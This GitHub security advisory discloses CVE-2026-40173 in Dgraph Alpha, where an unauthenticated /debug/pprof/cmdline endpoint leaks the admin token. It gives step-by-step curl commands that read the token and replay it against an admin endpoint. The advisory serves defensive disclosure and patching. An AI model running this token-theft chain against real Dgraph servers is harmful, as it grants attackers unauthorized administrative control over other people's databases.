Skip to content

Dgraph: Unauthenticated /debug/pprof/cmdline discloses admin auth token, enabling unauthorized access to protected Alpha admin endpoints

Critical severity GitHub Reviewed Published Apr 15, 2026 in dgraph-io/dgraph • Updated Apr 16, 2026

Package

gomod github.com/dgraph-io/dgraph (Go)

Affected versions

<= 1.2.8

Patched versions

None
gomod github.com/dgraph-io/dgraph/v24 (Go)
<= 24.1.7
None
gomod github.com/dgraph-io/dgraph/v25 (Go)
< 25.3.2
25.3.2

Description

Summary

An unauthenticated debug endpoint in Dgraph Alpha exposes the full process command line, including the configured admin token from --security "token=...".

This does not break token validation logic directly; instead, it discloses the credential and enables unauthorized admin-level access by reusing the leaked token in X-Dgraph-AuthToken.

Details

The behavior occurs entirely within core Alpha HTTP routing and does not require any external proxy, plugin, or non-core integration.

The core issue is not that admin token protection is absent, but that the protected secret is exposed in cleartext through an unauthenticated core debug endpoint.

Relevant code paths:

  • dgraph/cmd/alpha/run.go:17 imports net/http/pprof, which registers /debug/pprof/* handlers on the default mux.
  • dgraph/cmd/alpha/run.go:533 uses http.Handle("/", audit.AuditRequestHttp(baseMux)), so default-mux handlers remain reachable.
  • dgraph/cmd/alpha/admin.go:52 enforces admin token checks in adminAuthHandler for admin endpoints.
  • dgraph/cmd/alpha/admin.go:74 shows /admin/config/cache_mb behind adminAuthHandler.

Credential-exposure chain:

  1. /debug/pprof/cmdline is reachable without authentication.
  2. Its output includes the configured admin token from process arguments.
  3. The disclosed token is accepted by adminAuthHandler when sent as X-Dgraph-AuthToken.
  4. An attacker gains unauthorized access to admin-only functionality.

Observed local evidence (safe validation):

  • Request: GET /admin/config/cache_mb without token
    • Status: 200 (request rejected at application layer)
    • Body contains error: Invalid X-Dgraph-AuthToken
    • The endpoint returns HTTP 200 but indicates authentication failure in the response body.
  • Request: GET /debug/pprof/cmdline without token
    • Status: 200
    • Body excerpt includes: --security=token=TopSecretToken123;
  • Request: GET /admin/config/cache_mb with X-Dgraph-AuthToken: TopSecretToken123
    • Status: 200
    • Body: 4096

Important policy/triage clarification:

  • This issue persists even when the admin-token security feature is enabled: the token itself is exposed via an unauthenticated core debug endpoint, making this more than a misconfiguration-only concern.
  • Network restrictions (bind/whitelist/firewall) may reduce exposure, but they do not remediate the underlying credential disclosure behavior.

PoC

  • Branch: main
  • Commit: b15c87e93
  • Describe: v25.3.1

Preconditions:

  • Alpha HTTP port is reachable by attacker traffic.
  • Admin token is configured via supported startup flag: --security "token=...".
  • /debug/pprof/* is exposed on the same Alpha HTTP listener.
  • This behavior occurs with documented startup flags and without any non-default or unsupported configuration.

Reproduction steps:

  1. Start Zero and Alpha (example local setup):

    • dgraph zero --my=127.0.0.1:5280 --port_offset=200 --bindall=false --wal=./zw
    • dgraph alpha --my=127.0.0.1:7280 --zero=127.0.0.1:5280 --port_offset=200 --bindall=false --security "token=TopSecretToken123;" --postings=./p --wal=./w --tmp=./t

  2. Verify admin endpoint rejects unauthenticated request:

    • curl -i http://127.0.0.1:8280/admin/config/cache_mb
    • Expected body includes Invalid X-Dgraph-AuthToken.

  3. Read token from unauthenticated debug endpoint:

    • curl -s http://127.0.0.1:8280/debug/pprof/cmdline
    • Expected output includes --security=token=TopSecretToken123;.

  4. Reuse leaked token against admin endpoint:

    • curl -i -H "X-Dgraph-AuthToken: TopSecretToken123" http://127.0.0.1:8280/admin/config/cache_mb
    • Expected: successful response (example observed: 4096).

Note: The PoC uses 127.0.0.1 only for safe local validation. The vulnerable condition is unauthenticated reachability of /debug/pprof/cmdline; in any deployment where Alpha HTTP is reachable by untrusted parties, the same token disclosure and subsequent unauthorized admin access apply.

Impact

  • Unauthenticated disclosure of a sensitive admin credential via debug endpoint, enabling unauthorized privileged administrative access through token reuse
  • Operators running Dgraph Alpha with admin token configured, where Alpha HTTP/debug routes are reachable by untrusted users or networks.

The attack requires network reachability to the Alpha HTTP port. In deployments where this interface is exposed beyond trusted boundaries, the issue is remotely exploitable without authentication.

Depending on exposed admin functionality in deployment policy, this may allow configuration changes, operational control actions, and other privileged administrative operations exposed through /admin/*.

References

@matthewmcneely matthewmcneely published to dgraph-io/dgraph Apr 15, 2026
Published by the National Vulnerability Database Apr 15, 2026
Published to the GitHub Advisory Database Apr 16, 2026
Reviewed Apr 16, 2026
Last updated Apr 16, 2026

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(32nd percentile)

Weaknesses

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. Learn more on MITRE.

Insertion of Sensitive Information Into Debugging Code

The product inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production. Learn more on MITRE.

CVE ID

CVE-2026-40173

GHSA ID

GHSA-95mq-xwj4-r47p

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.